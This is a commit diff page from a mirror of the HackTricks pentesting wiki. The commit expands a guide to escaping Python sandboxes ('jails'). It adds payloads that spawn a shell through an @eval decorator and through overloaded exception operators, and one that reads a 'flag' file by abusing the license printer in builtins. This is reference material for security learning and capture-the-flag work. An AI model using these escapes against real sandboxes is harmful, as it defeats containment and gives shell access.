0x22bb/hacktricks
1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Code Releases Activity

GitBook: [#3304] No subject

Browse source
This commit is contained in:
CPol 2022-07-03 20:38:21 +00:00 committed by gitbook-bot
parent 63b9773711
commit a5d822e198
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 23 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

25
generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
View file

@ -134,7 +134,17 @@ exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
## Python execution without calls
If you are inside a python jail that doesn't allow to make calls, there are still some ways to execute arbitrary functions:
If you are inside a python jail that **doesn't allow to make calls**, there are still some ways to **execute arbitrary functions, code** and **commands**.
### RCE with @eval
```python
@eval
@'__import__("os").system("sh")'.format
class _:pass
```
### RCE Declaring exceptions
```python
# Declare arbitrary exception class
@ -143,7 +153,7 @@ class Klecko(Exception):
return 1
# Change add function
Klecko.__add__ = os.system
Klecko.__add__ = os.system #os is already imported
# Generate an object of the class with a try/except + raise
## Trick from @_nag0mez
@ -180,6 +190,17 @@ __ior__ (k |= "/bin/bash -i")
__ixor__ (k ^= "/bin/bash -i")
```
### Read file with builtins help
```python
__builtins__.__dict__["license"]._Printer__filenames=["flag"]
a = __builtins__.help
a.__class__.__enter__ = __builtins__.__dict__["license"]
a.__class__.__exit__ = lambda self, *args: None
with (a as b):
pass
```
## Builtins
* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)